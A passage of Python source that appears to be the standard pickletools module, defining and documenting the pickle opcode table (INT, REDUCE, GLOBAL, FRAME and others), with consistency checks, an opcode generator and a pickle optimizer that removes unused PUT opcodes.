    obtype=frozenset,
    doc="A Python frozenset object.")
anyobject = StackObject(
name='any',
obtype=object,
doc="Any kind of object whatsoever.")
markobject = StackObject(
name="mark",
obtype=StackObject,
doc="""'The mark' is a unique object.
Opcodes that operate on a variable number of objects
generally don't embed the count of objects in the opcode,
or pull it off the stack. Instead the MARK opcode is used
to push a special marker object on the stack, and then
some other opcodes grab all the objects from the top of
the stack down to (but not including) the topmost marker
object.
""")
stackslice = StackObject(
name="stackslice",
obtype=StackObject,
doc="""An object representing a contiguous slice of the stack.
This is used in conjunction with markobject, to represent all
of the stack following the topmost markobject. For example,
the POP_MARK opcode changes the stack from
[..., markobject, stackslice]
to
[...]
No matter how many object are on the stack after the topmost
markobject, POP_MARK gets rid of all of them (including the
topmost markobject too).
""")
##############################################################################
# Descriptors for pickle opcodes.
class OpcodeInfo(object):
    """Descriptor record for a single pickle opcode.

    Bundles together everything known about one opcode: its symbolic name,
    the byte that encodes it, the descriptor of its in-stream argument
    (if any), its stack effect, the protocol that introduced it, and
    human-readable documentation.
    """

    __slots__ = (
        # symbolic name of opcode; a string
        'name',

        # the code used in a bytestream to represent the opcode; a
        # one-character string
        'code',

        # If the opcode has an argument embedded in the byte string, an
        # instance of ArgumentDescriptor specifying its type. Note that
        # arg.reader(s) can be used to read and decode the argument from
        # the bytestream s, and arg.doc documents the format of the raw
        # argument bytes. If the opcode doesn't have an argument embedded
        # in the bytestream, arg should be None.
        'arg',

        # what the stack looks like before this opcode runs; a list
        'stack_before',

        # what the stack looks like after this opcode runs; a list
        'stack_after',

        # the protocol number in which this opcode was introduced; an int
        'proto',

        # human-readable docs for this opcode; a string
        'doc',
    )

    def __init__(self, name, code, arg,
                 stack_before, stack_after, proto, doc):
        """Validate every field eagerly so a malformed opcode table fails
        loudly at import time rather than later, during disassembly."""
        assert isinstance(name, str)
        self.name = name

        assert isinstance(code, str)
        assert len(code) == 1
        self.code = code

        assert arg is None or isinstance(arg, ArgumentDescriptor)
        self.arg = arg

        assert isinstance(stack_before, list)
        for x in stack_before:
            assert isinstance(x, StackObject)
        self.stack_before = stack_before

        assert isinstance(stack_after, list)
        for x in stack_after:
            assert isinstance(x, StackObject)
        self.stack_after = stack_after

        assert isinstance(proto, int) and 0 <= proto <= pickle.HIGHEST_PROTOCOL
        self.proto = proto

        assert isinstance(doc, str)
        self.doc = doc
I = OpcodeInfo
opcodes = [
# Ways to spell integers.
I(name='INT',
code='I',
arg=decimalnl_short,
stack_before=[],
stack_after=[pyinteger_or_bool],
proto=0,
doc="""Push an integer or bool.
The argument is a newline-terminated decimal literal string.
The intent may have been that this always fit in a short Python int,
but INT can be generated in pickles written on a 64-bit box that
require a Python long on a 32-bit box. The difference between this
and LONG then is that INT skips a trailing 'L', and produces a short
int whenever possible.
Another difference is due to that, when bool was introduced as a
distinct type in 2.3, builtin names True and False were also added to
2.2.2, mapping to ints 1 and 0. For compatibility in both directions,
True gets pickled as INT + "I01\\n", and False as INT + "I00\\n".
Leading zeroes are never produced for a genuine integer. The 2.3
(and later) unpicklers special-case these and return bool instead;
earlier unpicklers ignore the leading "0" and return the int.
"""),
I(name='BININT',
code='J',
arg=int4,
stack_before=[],
stack_after=[pyint],
proto=1,
doc="""Push a four-byte signed integer.
This handles the full range of Python (short) integers on a 32-bit
box, directly as binary bytes (1 for the opcode and 4 for the integer).
If the integer is non-negative and fits in 1 or 2 bytes, pickling via
BININT1 or BININT2 saves space.
"""),
I(name='BININT1',
code='K',
arg=uint1,
stack_before=[],
stack_after=[pyint],
proto=1,
doc="""Push a one-byte unsigned integer.
This is a space optimization for pickling very small non-negative ints,
in range(256).
"""),
I(name='BININT2',
code='M',
arg=uint2,
stack_before=[],
stack_after=[pyint],
proto=1,
doc="""Push a two-byte unsigned integer.
This is a space optimization for pickling small positive ints, in
range(256, 2**16). Integers in range(256) can also be pickled via
BININT2, but BININT1 instead saves a byte.
"""),
I(name='LONG',
code='L',
arg=decimalnl_long,
stack_before=[],
stack_after=[pyint],
proto=0,
doc="""Push a long integer.
The same as INT, except that the literal ends with 'L', and always
unpickles to a Python long. There doesn't seem a real purpose to the
trailing 'L'.
Note that LONG takes time quadratic in the number of digits when
unpickling (this is simply due to the nature of decimal->binary
conversion). Proto 2 added linear-time (in C; still quadratic-time
in Python) LONG1 and LONG4 opcodes.
"""),
I(name="LONG1",
code='\x8a',
arg=long1,
stack_before=[],
stack_after=[pyint],
proto=2,
doc="""Long integer using one-byte length.
A more efficient encoding of a Python long; the long1 encoding
says it all."""),
I(name="LONG4",
code='\x8b',
arg=long4,
stack_before=[],
stack_after=[pyint],
proto=2,
doc="""Long integer using found-byte length.
A more efficient encoding of a Python long; the long4 encoding
says it all."""),
# Ways to spell strings (8-bit, not Unicode).
I(name='STRING',
code='S',
arg=stringnl,
stack_before=[],
stack_after=[pybytes_or_str],
proto=0,
doc="""Push a Python string object.
The argument is a repr-style string, with bracketing quote characters,
and perhaps embedded escapes. The argument extends until the next
newline character. These are usually decoded into a str instance
using the encoding given to the Unpickler constructor. or the default,
'ASCII'. If the encoding given was 'bytes' however, they will be
decoded as bytes object instead.
"""),
I(name='BINSTRING',
code='T',
arg=string4,
stack_before=[],
stack_after=[pybytes_or_str],
proto=1,
doc="""Push a Python string object.
There are two arguments: the first is a 4-byte little-endian
signed int giving the number of bytes in the string, and the
second is that many bytes, which are taken literally as the string
content. These are usually decoded into a str instance using the
encoding given to the Unpickler constructor. or the default,
'ASCII'. If the encoding given was 'bytes' however, they will be
decoded as bytes object instead.
"""),
I(name='SHORT_BINSTRING',
code='U',
arg=string1,
stack_before=[],
stack_after=[pybytes_or_str],
proto=1,
doc="""Push a Python string object.
There are two arguments: the first is a 1-byte unsigned int giving
the number of bytes in the string, and the second is that many
bytes, which are taken literally as the string content. These are
usually decoded into a str instance using the encoding given to
the Unpickler constructor. or the default, 'ASCII'. If the
encoding given was 'bytes' however, they will be decoded as bytes
object instead.
"""),
# Bytes (protocol 3 only; older protocols don't support bytes at all)
I(name='BINBYTES',
code='B',
arg=bytes4,
stack_before=[],
stack_after=[pybytes],
proto=3,
doc="""Push a Python bytes object.
There are two arguments: the first is a 4-byte little-endian unsigned int
giving the number of bytes, and the second is that many bytes, which are
taken literally as the bytes content.
"""),
I(name='SHORT_BINBYTES',
code='C',
arg=bytes1,
stack_before=[],
stack_after=[pybytes],
proto=3,
doc="""Push a Python bytes object.
There are two arguments: the first is a 1-byte unsigned int giving
the number of bytes, and the second is that many bytes, which are taken
literally as the string content.
"""),
I(name='BINBYTES8',
code='\x8e',
arg=bytes8,
stack_before=[],
stack_after=[pybytes],
proto=4,
doc="""Push a Python bytes object.
There are two arguments: the first is a 8-byte unsigned int giving
the number of bytes in the string, and the second is that many bytes,
which are taken literally as the string content.
"""),
# Ways to spell None.
I(name='NONE',
code='N',
arg=None,
stack_before=[],
stack_after=[pynone],
proto=0,
doc="Push None on the stack."),
# Ways to spell bools, starting with proto 2. See INT for how this was
# done before proto 2.
I(name='NEWTRUE',
code='\x88',
arg=None,
stack_before=[],
stack_after=[pybool],
proto=2,
doc="""True.
Push True onto the stack."""),
I(name='NEWFALSE',
code='\x89',
arg=None,
stack_before=[],
stack_after=[pybool],
proto=2,
doc="""True.
Push False onto the stack."""),
# Ways to spell Unicode strings.
I(name='UNICODE',
code='V',
arg=unicodestringnl,
stack_before=[],
stack_after=[pyunicode],
proto=0, # this may be pure-text, but it's a later addition
doc="""Push a Python Unicode string object.
The argument is a raw-unicode-escape encoding of a Unicode string,
and so may contain embedded escape sequences. The argument extends
until the next newline character.
"""),
I(name='SHORT_BINUNICODE',
code='\x8c',
arg=unicodestring1,
stack_before=[],
stack_after=[pyunicode],
proto=4,
doc="""Push a Python Unicode string object.
There are two arguments: the first is a 1-byte little-endian signed int
giving the number of bytes in the string. The second is that many
bytes, and is the UTF-8 encoding of the Unicode string.
"""),
I(name='BINUNICODE',
code='X',
arg=unicodestring4,
stack_before=[],
stack_after=[pyunicode],
proto=1,
doc="""Push a Python Unicode string object.
There are two arguments: the first is a 4-byte little-endian unsigned int
giving the number of bytes in the string. The second is that many
bytes, and is the UTF-8 encoding of the Unicode string.
"""),
I(name='BINUNICODE8',
code='\x8d',
arg=unicodestring8,
stack_before=[],
stack_after=[pyunicode],
proto=4,
doc="""Push a Python Unicode string object.
There are two arguments: the first is a 8-byte little-endian signed int
giving the number of bytes in the string. The second is that many
bytes, and is the UTF-8 encoding of the Unicode string.
"""),
# Ways to spell floats.
I(name='FLOAT',
code='F',
arg=floatnl,
stack_before=[],
stack_after=[pyfloat],
proto=0,
doc="""Newline-terminated decimal float literal.
The argument is repr(a_float), and in general requires 17 significant
digits for roundtrip conversion to be an identity (this is so for
IEEE-754 double precision values, which is what Python float maps to
on most boxes).
In general, FLOAT cannot be used to transport infinities, NaNs, or
minus zero across boxes (or even on a single box, if the platform C
library can't read the strings it produces for such things -- Windows
is like that), but may do less damage than BINFLOAT on boxes with
greater precision or dynamic range than IEEE-754 double.
"""),
I(name='BINFLOAT',
code='G',
arg=float8,
stack_before=[],
stack_after=[pyfloat],
proto=1,
doc="""Float stored in binary form, with 8 bytes of data.
This generally requires less than half the space of FLOAT encoding.
In general, BINFLOAT cannot be used to transport infinities, NaNs, or
minus zero, raises an exception if the exponent exceeds the range of
an IEEE-754 double, and retains no more than 53 bits of precision (if
there are more than that, "add a half and chop" rounding is used to
cut it back to 53 significant bits).
"""),
# Ways to build lists.
I(name='EMPTY_LIST',
code=']',
arg=None,
stack_before=[],
stack_after=[pylist],
proto=1,
doc="Push an empty list."),
I(name='APPEND',
code='a',
arg=None,
stack_before=[pylist, anyobject],
stack_after=[pylist],
proto=0,
doc="""Append an object to a list.
Stack before: ... pylist anyobject
Stack after: ... pylist+[anyobject]
although pylist is really extended in-place.
"""),
I(name='APPENDS',
code='e',
arg=None,
stack_before=[pylist, markobject, stackslice],
stack_after=[pylist],
proto=1,
doc="""Extend a list by a slice of stack objects.
Stack before: ... pylist markobject stackslice
Stack after: ... pylist+stackslice
although pylist is really extended in-place.
"""),
I(name='LIST',
code='l',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pylist],
proto=0,
doc="""Build a list out of the topmost stack slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python list, which single list object replaces all of the
stack from the topmost markobject onward. For example,
Stack before: ... markobject 1 2 3 'abc'
Stack after: ... [1, 2, 3, 'abc']
"""),
# Ways to build tuples.
I(name='EMPTY_TUPLE',
code=')',
arg=None,
stack_before=[],
stack_after=[pytuple],
proto=1,
doc="Push an empty tuple."),
I(name='TUPLE',
code='t',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pytuple],
proto=0,
doc="""Build a tuple out of the topmost stack slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python tuple, which single tuple object replaces all of the
stack from the topmost markobject onward. For example,
Stack before: ... markobject 1 2 3 'abc'
Stack after: ... (1, 2, 3, 'abc')
"""),
I(name='TUPLE1',
code='\x85',
arg=None,
stack_before=[anyobject],
stack_after=[pytuple],
proto=2,
doc="""Build a one-tuple out of the topmost item on the stack.
This code pops one value off the stack and pushes a tuple of
length 1 whose one item is that value back onto it. In other
words:
stack[-1] = tuple(stack[-1:])
"""),
I(name='TUPLE2',
code='\x86',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[pytuple],
proto=2,
doc="""Build a two-tuple out of the top two items on the stack.
This code pops two values off the stack and pushes a tuple of
length 2 whose items are those values back onto it. In other
words:
stack[-2:] = [tuple(stack[-2:])]
"""),
I(name='TUPLE3',
code='\x87',
arg=None,
stack_before=[anyobject, anyobject, anyobject],
stack_after=[pytuple],
proto=2,
doc="""Build a three-tuple out of the top three items on the stack.
This code pops three values off the stack and pushes a tuple of
length 3 whose items are those values back onto it. In other
words:
stack[-3:] = [tuple(stack[-3:])]
"""),
# Ways to build dicts.
I(name='EMPTY_DICT',
code='}',
arg=None,
stack_before=[],
stack_after=[pydict],
proto=1,
doc="Push an empty dict."),
I(name='DICT',
code='d',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pydict],
proto=0,
doc="""Build a dict out of the topmost stack slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python dict, which single dict object replaces all of the
stack from the topmost markobject onward. The stack slice alternates
key, value, key, value, .... For example,
Stack before: ... markobject 1 2 3 'abc'
Stack after: ... {1: 2, 3: 'abc'}
"""),
I(name='SETITEM',
code='s',
arg=None,
stack_before=[pydict, anyobject, anyobject],
stack_after=[pydict],
proto=0,
doc="""Add a key+value pair to an existing dict.
Stack before: ... pydict key value
Stack after: ... pydict
where pydict has been modified via pydict[key] = value.
"""),
I(name='SETITEMS',
code='u',
arg=None,
stack_before=[pydict, markobject, stackslice],
stack_after=[pydict],
proto=1,
doc="""Add an arbitrary number of key+value pairs to an existing dict.
The slice of the stack following the topmost markobject is taken as
an alternating sequence of keys and values, added to the dict
immediately under the topmost markobject. Everything at and after the
topmost markobject is popped, leaving the mutated dict at the top
of the stack.
Stack before: ... pydict markobject key_1 value_1 ... key_n value_n
Stack after: ... pydict
where pydict has been modified via pydict[key_i] = value_i for i in
1, 2, ..., n, and in that order.
"""),
# Ways to build sets
I(name='EMPTY_SET',
code='\x8f',
arg=None,
stack_before=[],
stack_after=[pyset],
proto=4,
doc="Push an empty set."),
I(name='ADDITEMS',
code='\x90',
arg=None,
stack_before=[pyset, markobject, stackslice],
stack_after=[pyset],
proto=4,
doc="""Add an arbitrary number of items to an existing set.
The slice of the stack following the topmost markobject is taken as
a sequence of items, added to the set immediately under the topmost
markobject. Everything at and after the topmost markobject is popped,
leaving the mutated set at the top of the stack.
Stack before: ... pyset markobject item_1 ... item_n
Stack after: ... pyset
where pyset has been modified via pyset.add(item_i) = item_i for i in
1, 2, ..., n, and in that order.
"""),
# Way to build frozensets
I(name='FROZENSET',
code='\x91',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[pyfrozenset],
proto=4,
doc="""Build a frozenset out of the topmost slice, after markobject.
All the stack entries following the topmost markobject are placed into
a single Python frozenset, which single frozenset object replaces all
of the stack from the topmost markobject onward. For example,
Stack before: ... markobject 1 2 3
Stack after: ... frozenset({1, 2, 3})
"""),
# Stack manipulation.
I(name='POP',
code='0',
arg=None,
stack_before=[anyobject],
stack_after=[],
proto=0,
doc="Discard the top stack item, shrinking the stack by one item."),
I(name='DUP',
code='2',
arg=None,
stack_before=[anyobject],
stack_after=[anyobject, anyobject],
proto=0,
doc="Push the top stack item onto the stack again, duplicating it."),
I(name='MARK',
code='(',
arg=None,
stack_before=[],
stack_after=[markobject],
proto=0,
doc="""Push markobject onto the stack.
markobject is a unique object, used by other opcodes to identify a
region of the stack containing a variable number of objects for them
to work on. See markobject.doc for more detail.
"""),
I(name='POP_MARK',
code='1',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[],
proto=1,
doc="""Pop all the stack objects at and above the topmost markobject.
When an opcode using a variable number of stack objects is done,
POP_MARK is used to remove those objects, and to remove the markobject
that delimited their starting position on the stack.
"""),
# Memo manipulation. There are really only two operations (get and put),
# each in all-text, "short binary", and "long binary" flavors.
I(name='GET',
code='g',
arg=decimalnl_short,
stack_before=[],
stack_after=[anyobject],
proto=0,
doc="""Read an object from the memo and push it on the stack.
The index of the memo object to push is given by the newline-terminated
decimal string following. BINGET and LONG_BINGET are space-optimized
versions.
"""),
I(name='BINGET',
code='h',
arg=uint1,
stack_before=[],
stack_after=[anyobject],
proto=1,
doc="""Read an object from the memo and push it on the stack.
The index of the memo object to push is given by the 1-byte unsigned
integer following.
"""),
I(name='LONG_BINGET',
code='j',
arg=uint4,
stack_before=[],
stack_after=[anyobject],
proto=1,
doc="""Read an object from the memo and push it on the stack.
The index of the memo object to push is given by the 4-byte unsigned
little-endian integer following.
"""),
I(name='PUT',
code='p',
arg=decimalnl_short,
stack_before=[],
stack_after=[],
proto=0,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write into is given by the newline-
terminated decimal string following. BINPUT and LONG_BINPUT are
space-optimized versions.
"""),
I(name='BINPUT',
code='q',
arg=uint1,
stack_before=[],
stack_after=[],
proto=1,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write into is given by the 1-byte
unsigned integer following.
"""),
I(name='LONG_BINPUT',
code='r',
arg=uint4,
stack_before=[],
stack_after=[],
proto=1,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write into is given by the 4-byte
unsigned little-endian integer following.
"""),
I(name='MEMOIZE',
code='\x94',
arg=None,
stack_before=[anyobject],
stack_after=[anyobject],
proto=4,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write is the number of
elements currently present in the memo.
"""),
# Access the extension registry (predefined objects). Akin to the GET
# family.
I(name='EXT1',
code='\x82',
arg=uint1,
stack_before=[],
stack_after=[anyobject],
proto=2,
doc="""Extension code.
This code and the similar EXT2 and EXT4 allow using a registry
of popular objects that are pickled by name, typically classes.
It is envisioned that through a global negotiation and
registration process, third parties can set up a mapping between
ints and object names.
In order to guarantee pickle interchangeability, the extension
code registry ought to be global, although a range of codes may
be reserved for private use.
EXT1 has a 1-byte integer argument. This is used to index into the
extension registry, and the object at that index is pushed on the stack.
"""),
I(name='EXT2',
code='\x83',
arg=uint2,
stack_before=[],
stack_after=[anyobject],
proto=2,
doc="""Extension code.
See EXT1. EXT2 has a two-byte integer argument.
"""),
I(name='EXT4',
code='\x84',
arg=int4,
stack_before=[],
stack_after=[anyobject],
proto=2,
doc="""Extension code.
See EXT1. EXT4 has a four-byte integer argument.
"""),
# Push a class object, or module function, on the stack, via its module
# and name.
I(name='GLOBAL',
code='c',
arg=stringnl_noescape_pair,
stack_before=[],
stack_after=[anyobject],
proto=0,
doc="""Push a global object (module.attr) on the stack.
Two newline-terminated strings follow the GLOBAL opcode. The first is
taken as a module name, and the second as a class name. The class
object module.class is pushed on the stack. More accurately, the
object returned by self.find_class(module, class) is pushed on the
stack, so unpickling subclasses can override this form of lookup.
"""),
I(name='STACK_GLOBAL',
code='\x93',
arg=None,
stack_before=[pyunicode, pyunicode],
stack_after=[anyobject],
proto=0,
doc="""Push a global object (module.attr) on the stack.
"""),
# Ways to build objects of classes pickle doesn't know about directly
# (user-defined classes). I despair of documenting this accurately
# and comprehensibly -- you really have to read the pickle code to
# find all the special cases.
I(name='REDUCE',
code='R',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=0,
doc="""Push an object built from a callable and an argument tuple.
The opcode is named to remind of the __reduce__() method.
Stack before: ... callable pytuple
Stack after: ... callable(*pytuple)
The callable and the argument tuple are the first two items returned
by a __reduce__ method. Applying the callable to the argtuple is
supposed to reproduce the original object, or at least get it started.
If the __reduce__ method returns a 3-tuple, the last component is an
argument to be passed to the object's __setstate__, and then the REDUCE
opcode is followed by code to create setstate's argument, and then a
BUILD opcode to apply __setstate__ to that argument.
If not isinstance(callable, type), REDUCE complains unless the
callable has been registered with the copyreg module's
safe_constructors dict, or the callable has a magic
'__safe_for_unpickling__' attribute with a true value. I'm not sure
why it does this, but I've sure seen this complaint often enough when
I didn't want to <wink>.
"""),
I(name='BUILD',
code='b',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=0,
doc="""Finish building an object, via __setstate__ or dict update.
Stack before: ... anyobject argument
Stack after: ... anyobject
where anyobject may have been mutated, as follows:
If the object has a __setstate__ method,
anyobject.__setstate__(argument)
is called.
Else the argument must be a dict, the object must have a __dict__, and
the object is updated via
anyobject.__dict__.update(argument)
"""),
I(name='INST',
code='i',
arg=stringnl_noescape_pair,
stack_before=[markobject, stackslice],
stack_after=[anyobject],
proto=0,
doc="""Build a class instance.
This is the protocol 0 version of protocol 1's OBJ opcode.
INST is followed by two newline-terminated strings, giving a
module and class name, just as for the GLOBAL opcode (and see
GLOBAL for more details about that). self.find_class(module, name)
is used to get a class object.
In addition, all the objects on the stack following the topmost
markobject are gathered into a tuple and popped (along with the
topmost markobject), just as for the TUPLE opcode.
Now it gets complicated. If all of these are true:
+ The argtuple is empty (markobject was at the top of the stack
at the start).
+ The class object does not have a __getinitargs__ attribute.
then we want to create an old-style class instance without invoking
its __init__() method (pickle has waffled on this over the years; not
calling __init__() is current wisdom). In this case, an instance of
an old-style dummy class is created, and then we try to rebind its
__class__ attribute to the desired class object. If this succeeds,
the new instance object is pushed on the stack, and we're done.
Else (the argtuple is not empty, it's not an old-style class object,
or the class object does have a __getinitargs__ attribute), the code
first insists that the class object have a __safe_for_unpickling__
attribute. Unlike as for the __safe_for_unpickling__ check in REDUCE,
it doesn't matter whether this attribute has a true or false value, it
only matters whether it exists (XXX this is a bug). If
__safe_for_unpickling__ doesn't exist, UnpicklingError is raised.
Else (the class object does have a __safe_for_unpickling__ attr),
the class object obtained from INST's arguments is applied to the
argtuple obtained from the stack, and the resulting instance object
is pushed on the stack.
NOTE: checks for __safe_for_unpickling__ went away in Python 2.3.
NOTE: the distinction between old-style and new-style classes does
not make sense in Python 3.
"""),
I(name='OBJ',
code='o',
arg=None,
stack_before=[markobject, anyobject, stackslice],
stack_after=[anyobject],
proto=1,
doc="""Build a class instance.
This is the protocol 1 version of protocol 0's INST opcode, and is
very much like it. The major difference is that the class object
is taken off the stack, allowing it to be retrieved from the memo
repeatedly if several instances of the same class are created. This
can be much more efficient (in both time and space) than repeatedly
embedding the module and class names in INST opcodes.
Unlike INST, OBJ takes no arguments from the opcode stream. Instead
the class object is taken off the stack, immediately above the
topmost markobject:
Stack before: ... markobject classobject stackslice
Stack after: ... new_instance_object
As for INST, the remainder of the stack above the markobject is
gathered into an argument tuple, and then the logic seems identical,
except that no __safe_for_unpickling__ check is done (XXX this is
a bug). See INST for the gory details.
NOTE: In Python 2.3, INST and OBJ are identical except for how they
get the class object. That was always the intent; the implementations
had diverged for accidental reasons.
"""),
I(name='NEWOBJ',
code='\x81',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=2,
doc="""Build an object instance.
The stack before should be thought of as containing a class
object followed by an argument tuple (the tuple being the stack
top). Call these cls and args. They are popped off the stack,
and the value returned by cls.__new__(cls, *args) is pushed back
onto the stack.
"""),
I(name='NEWOBJ_EX',
code='\x92',
arg=None,
stack_before=[anyobject, anyobject, anyobject],
stack_after=[anyobject],
proto=4,
doc="""Build an object instance.
The stack before should be thought of as containing a class
object followed by an argument tuple and by a keyword argument dict
(the dict being the stack top). Call these cls and args. They are
popped off the stack, and the value returned by
cls.__new__(cls, *args, *kwargs) is pushed back onto the stack.
"""),
# Machine control.
I(name='PROTO',
code='\x80',
arg=uint1,
stack_before=[],
stack_after=[],
proto=2,
doc="""Protocol version indicator.
For protocol 2 and above, a pickle must start with this opcode.
The argument is the protocol version, an int in range(2, 256).
"""),
I(name='STOP',
code='.',
arg=None,
stack_before=[anyobject],
stack_after=[],
proto=0,
doc="""Stop the unpickling machine.
Every pickle ends with this opcode. The object at the top of the stack
is popped, and that's the result of unpickling. The stack should be
empty then.
"""),
# Framing support.
I(name='FRAME',
code='\x95',
arg=uint8,
stack_before=[],
stack_after=[],
proto=4,
doc="""Indicate the beginning of a new frame.
The unpickler may use this opcode to safely prefetch data from its
underlying stream.
"""),
# Ways to deal with persistent IDs.
I(name='PERSID',
code='P',
arg=stringnl_noescape,
stack_before=[],
stack_after=[anyobject],
proto=0,
doc="""Push an object identified by a persistent ID.
The pickle module doesn't define what a persistent ID means. PERSID's
argument is a newline-terminated str-style (no embedded escapes, no
bracketing quote characters) string, which *is* "the persistent ID".
The unpickler passes this string to self.persistent_load(). Whatever
object that returns is pushed on the stack. There is no implementation
of persistent_load() in Python's unpickler: it must be supplied by an
unpickler subclass.
"""),
I(name='BINPERSID',
code='Q',
arg=None,
stack_before=[anyobject],
stack_after=[anyobject],
proto=1,
doc="""Push an object identified by a persistent ID.
Like PERSID, except the persistent ID is popped off the stack (instead
of being a string embedded in the opcode bytestream). The persistent
ID is passed to self.persistent_load(), and whatever object that
returns is pushed on the stack. See PERSID for more detail.
"""),
]
del I
# Sanity check: each opcode's .name and .code must appear exactly once in
# the table; fail at import time with the offending pair of indices.
seen_names = {}
seen_codes = {}
for index, info in enumerate(opcodes):
    if info.name in seen_names:
        raise ValueError("repeated name %r at indices %d and %d" %
                         (info.name, seen_names[info.name], index))
    if info.code in seen_codes:
        raise ValueError("repeated code %r at indices %d and %d" %
                         (info.code, seen_codes[info.code], index))
    seen_names[info.name] = index
    seen_codes[info.code] = index
# Drop the scratch names so they don't pollute the module namespace.
del seen_names, seen_codes, index, info
##############################################################################
# Build a code2op dict, mapping opcode characters to OpcodeInfo records.
# Also ensure we've got the same stuff as pickle.py, although the
# introspection here is dicey.

# Opcode codes were verified unique above, so each code character maps to
# exactly one record; a comprehension also leaves no loop variable behind.
code2op = {info.code: info for info in opcodes}
def assure_pickle_consistency(verbose=False):
    """Cross-check our opcode table against the opcode constants exported
    by pickle.py, raising ValueError on a mismatch in either direction.

    Opcode constants are recognized heuristically: an all-caps name in
    pickle.__all__ whose value is a single byte.  Pass verbose=True to
    print a line for every name considered.
    """
    copy = code2op.copy()
    for name in pickle.__all__:
        if not re.match("[A-Z][A-Z0-9_]+$", name):
            if verbose:
                print("skipping %r: it doesn't look like an opcode name" % name)
            continue
        picklecode = getattr(pickle, name)
        if not isinstance(picklecode, bytes) or len(picklecode) != 1:
            if verbose:
                print(("skipping %r: value %r doesn't look like a pickle "
                       "code" % (name, picklecode)))
            continue
        # Our table is keyed by 1-character str, pickle's constants are bytes.
        picklecode = picklecode.decode("latin-1")
        if picklecode in copy:
            if verbose:
                print("checking name %r w/ code %r for consistency" % (
                      name, picklecode))
            d = copy[picklecode]
            if d.name != name:
                raise ValueError("for pickle code %r, pickle.py uses name %r "
                                 "but we're using name %r" % (picklecode,
                                                              name,
                                                              d.name))
            # Forget this one.  Any left over in copy at the end are a problem
            # of a different kind.
            del copy[picklecode]
        else:
            raise ValueError("pickle.py appears to have a pickle opcode with "
                             "name %r and code %r, but we don't" %
                             (name, picklecode))
    if copy:
        msg = ["we appear to have pickle opcodes that pickle.py doesn't have:"]
        for code, d in copy.items():
            msg.append("    name %r with code %r" % (d.name, code))
        raise ValueError("\n".join(msg))

# Run the consistency check once at import time, then remove the helper.
assure_pickle_consistency()
del assure_pickle_consistency
##############################################################################
# A pickle opcode generator.
def _genops(data, yield_end_pos=False):
    """Yield (opcode, arg, pos[, end_pos]) tuples for every opcode in *data*.

    *data* is a bytes-like object or a readable binary file-like object.
    Iteration stops after the STOP ('.') opcode.  end_pos is only yielded
    when yield_end_pos is true.
    """
    # bytes_types is assumed to come from pickle's exports earlier in this
    # module (bytes-like types) -- not visible in this chunk; verify there.
    if isinstance(data, bytes_types):
        data = io.BytesIO(data)

    # Positions are only reported when the stream can tell() them.
    if hasattr(data, "tell"):
        getpos = data.tell
    else:
        getpos = lambda: None

    while True:
        pos = getpos()
        code = data.read(1)
        opcode = code2op.get(code.decode("latin-1"))
        if opcode is None:
            if code == b"":
                # EOF before STOP: the pickle is truncated.
                raise ValueError("pickle exhausted before seeing STOP")
            else:
                raise ValueError("at position %s, opcode %r unknown" % (
                                 "<unknown>" if pos is None else pos,
                                 code))
        if opcode.arg is None:
            arg = None
        else:
            # The opcode's ArgumentDescriptor knows how to decode its
            # embedded argument from the stream.
            arg = opcode.arg.reader(data)
        if yield_end_pos:
            yield opcode, arg, pos, getpos()
        else:
            yield opcode, arg, pos
        if code == b'.':
            assert opcode.name == 'STOP'
            break
def genops(pickle):
    """Generate all the opcodes in a pickle.

    'pickle' is a file-like object, or string, containing the pickle.

    Starting at the current position, one triple is produced per opcode
    until (and including) the first STOP opcode:

        opcode, arg, pos

    opcode -- the OpcodeInfo record describing the opcode.
    arg    -- the decoded Python value of the opcode's embedded argument,
              or None if the opcode takes no argument.
    pos    -- the stream position just before the opcode was read.  A bytes
              pickle is wrapped in a BytesIO, whose tell() supplies this;
              a file-like pickle without tell() yields pos of None.
    """
    return _genops(pickle, yield_end_pos=False)
##############################################################################
# A pickle optimizer.
def optimize(p):
    """Optimize a pickle string by removing unused PUT opcodes.

    *p* is a bytes-like pickle.  Returns a new pickle (bytes) in which every
    PUT/BINPUT/LONG_BINPUT whose memo slot is never read back by a GET is
    dropped.  For protocol >= 4 pickles the framing is recomputed from
    scratch (existing FRAME opcodes are discarded).
    """
    not_a_put = object()            # sentinel marking a non-PUT table entry
    gets = { not_a_put }            # set of args used by a GET opcode
    opcodes = []                    # (startpos, stoppos, putid)
    proto = 0
    for opcode, arg, pos, end_pos in _genops(p, yield_end_pos=True):
        if 'PUT' in opcode.name:
            opcodes.append((pos, end_pos, arg))
        elif 'FRAME' in opcode.name:
            # Old frames are dropped; new framing is emitted below.
            pass
        else:
            if 'GET' in opcode.name:
                gets.add(arg)
            elif opcode.name == 'PROTO':
                assert pos == 0, pos
                proto = arg
            opcodes.append((pos, end_pos, not_a_put))
            # NOTE: a dead "prevpos, prevarg = pos, None" assignment that was
            # never read has been removed here.

    # Copy the opcodes except for PUTS without a corresponding GET
    out = io.BytesIO()
    opcodes = iter(opcodes)
    if proto >= 2:
        # Write the PROTO header before any framing
        start, stop, _ = next(opcodes)
        out.write(p[start:stop])
    # pickle._Framer is a private helper of the pickle module; it buffers
    # writes and inserts FRAME opcodes for protocol >= 4.
    buf = pickle._Framer(out.write)
    if proto >= 4:
        buf.start_framing()
    for start, stop, putid in opcodes:
        # Non-PUT entries carry the sentinel, which is pre-seeded into
        # `gets`, so they are always copied; PUTs are copied only when
        # some GET actually references their memo slot.
        if putid in gets:
            buf.commit_frame()
            buf.write(p[start:stop])
    if proto >= 4:
        buf.end_framing()
    return out.getvalue()
##############################################################################
# A symbolic pickle disassembler.
